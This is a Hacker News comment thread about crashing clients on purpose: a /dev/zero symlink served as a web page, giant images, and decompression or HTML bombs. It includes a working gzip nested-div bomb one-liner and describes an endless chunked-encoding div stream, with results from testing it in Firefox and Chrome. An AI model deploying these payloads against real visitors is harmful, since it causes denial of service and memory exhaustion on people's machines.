← Back to context

Comment by layer8

7 months ago

Back when I was a stupid kid, I once did

    ln -s /dev/zero index.html

on my home page as a joke. Browsers at the time didn’t like that, they basically froze, sometimes taking the client system down with them.

Later on, browsers started to check for actual content I think, and would abort such requests.

I made a 64kx64k JPEG once by feeding the encoder the same line of macro blocks until it produce the entire image.

Years later I was finally able to open it.

  • I had a ton of trouble opening a 10MB or so png a few weeks back. It was stitched together screenshots forming a map of some areas in a game, so it was quite large. Some stuff refused to open it at all as if the file was invalid, some would hang for minutes, some opened blurry. My first semi-success was Fossify Gallery on my phone from F-Droid. If I let it chug a bit, it'd show a blurry image, a while longer it'd focus. Then I'd try to zoom or pan and it'd blur for ages again. I guess it was aggressively lazy-loading. What worked in the end was GIMP. I had the thought that the image was probably made in an editor, so surely an editor could open it. The catch is that it took like 8GB of RAM, but then I could see clearly, zoom, and pan all I wanted. It made me wonder why there's not an image viewer that's just the viewer part of GIMP or something.

    Among things that didn't work were qutebrowser, icecat, nsxiv, feh, imv, mpv. I did worry at first the file was corrupt, I was redownloading it, comparing hashes with a friend, etc. Makes for an interesting benchmark, I guess.

    For others curious, here's the file: https://0x0.st/82Ap.png

    I'd say just curl/wget it, don't expect it to load in a browser.

    • That's a 36,000x20,000 PNG, 720 megapixels. Many decoders explicitly limit the maximum image area they'll handle, under the reasonable assumption that it will exceed available RAM and take too long, and assume the file was crafted maliciously or by mistake.

    • On Firefox on Android on my pretty old phone, a blurry preview rendered in about 10 seconds, and it was fully rendered in 20 something seconds. Smooth panning and zooming the entire time

      2 replies →

    • I use honey view for reading comics etc. It can handle this.

      Old school acdsee would have been fine too.

      I think it's all the pixel processing on the modern image viewers (or they're just using system web views that isn't 100% just a straight render).

      I suspect that the more native renderers are doing some extra magic here. Or just being significantly more OK with using up all your ram.

    • IrfanView was able to load it in about 8 seconds (Ryzen 7 5800x) using 2.8GB of RAM, but zooming/panning is quite slow (~500ms per action)

      2 replies →

    • Firefox on a mid-tier Samsung and a cheapo data connection (4G) took avout 30s to load. I could pan, but it limited me from zooming much, and the little I could zoom in looked quite blury.

    • For what it's worth, this loaded (slowly) in Firefox on Windows for me (but zooming was blurry), and the default Photos viewer opened it no problem with smooth zooming and panning.

    • On my Waterfox 6.5.6, it opened but remained blurry when zoomed in. MS Paint refused to open it. The GIMP v2.99.18 crashed and took my display driver with it. Windows 10 Photo Viewer surprisingly managed to open it and keep it sharp when zoomed in. The GIMP v3.0.2 (latest version at the time of writing) crashed.

    • Safari on my MacBook Air opened it fine, though it took about four seconds. Zooming works fine as well. It does take ~3GB of memory according to Activity Monitor.

    • ImgurViewer from fdroid on an FP5 opened it blurry after around 5s and 5s later it was rendered completely.

      Pan&zoom works instantly with a blurry preview and then takes another 5-10s to render completely.

    • > don't expect it to load in a browser

      Takes a few seconds, but otherwise seems pretty ok in desktop Safari. Preview.app also handles it fine (albeit does allocate an extra ~1-2GB of RAM)

    • Loads fine and fairly quickly on a Macbook Pro M3 Pro with Firefox 137. Does have a bit of delay when initially zooming in, but pans and zooms fine after.

    • Loading this on my iPhone on 1gbit took about 5s and I can easily pan and zoom. A desktop should handle it beautifully.

    • It loaded after 10-15 seconds on myiPad Pro M1, although it did start reloading after I looked around in it.

    • on mobile Brave just displayed it as the placeholder broken link image but in Firefox it loaded in about 10s

  • I once encoded an entire TV OP into a multi-megabyte animated cursor (.ani) file.

    Surprisingly, Windows 95 didn't die trying to load it, but quite a lot of operations in the system took noticeably longer than they normally did.

I wonder if I could create a 500TB html file with proper headers on a squashfs, an endless <div><div><div>... with no closing tags, and if I could instruct the server to not report file size before download.

Any ideeas?

  • Why use squashfs when you can do the same OP did and serve a compressed version, so that the client is overwhelmed by both the uncompression and the DOM depth:

    yes "<div>"|dd bs=1M count=10240 iflag=fullblock|gzip | pv > zipdiv.gz

    Resulting file is about 15 mib long and uncompresses into a 10 gib monstrosity containing 1789569706 unclosed nested divs

  • Yes, servers can respond without specifying the size by using chunked encoding. And you can do the rest with a custom web server that just handles request by returning "<div>" in a loop. I have no idea if browsers are vulnerable to such a thing.

    • I just tested it via a small python script sending divs at a rate of ~900mb (as measured by curl) and firefox just kills the request after 1-2 gb received (~2 seconds) with an "out of memory" error, while chrome seems to only receive around 1mb/s, uses 1 cpu core 100%, and grows infinitely in memory use. I killed it after 3 mins and consuming ca. 6GB (additionally, on top of the memory it used at startup)

      1 reply →

Maybe it's time for a /dev/zipbomb device.

  • ln -s /dev/urandom /dev/zipbomb && echo 'Boom!'

    Ok, not a real zip bomb, for that we would need a kernel module.

    • > Ok, not a real zip bomb, for that we would need a kernel module.

      Or a userland fusefs program, nice funky idea actually (with configurable dynamic filenames, e.g. `mnt/10GiB_zeropattern.zip`...

Wait, you set up a symlink?

I am not sure how that could’ve worked. Unless the real /dev tree was exposed to your webserver’s chroot environment, this would’ve given nothing special except “file not found”.

The whole point of chroot for a webserver was to shield clients from accessing special files like that!

Could server-side includes be used for a html bomb?

Write an ordinary static html page and fill a <p> with infinite random data using <!--#include file="/dev/random"-->.

or would that crash the server?

  • I guess it depends on the server's implementation. but, since you need some logic to decide when to serve the html bomb anyway, I don't see why you would prefer this solution. Just use whatever script you're using to detect the bots to serve the bomb.

Devide by zero happens to everyone eventually.

https://medium.com/@bishr_tabbaa/when-smart-ships-divide-by-...

"On 21 September 1997, the USS Yorktown halted for almost three hours during training maneuvers off the coast of Cape Charles, Virginia due to a divide-by-zero error in a database application that propagated throughout the ship’s control systems."

" technician tried to digitally calibrate and reset the fuel valve by entering a 0 value for one of the valve’s component properties into the SMCS Remote Database Manager (RDM)"

we discovered back when IE3 came out that you could crash windows by leaving off a table closing tag.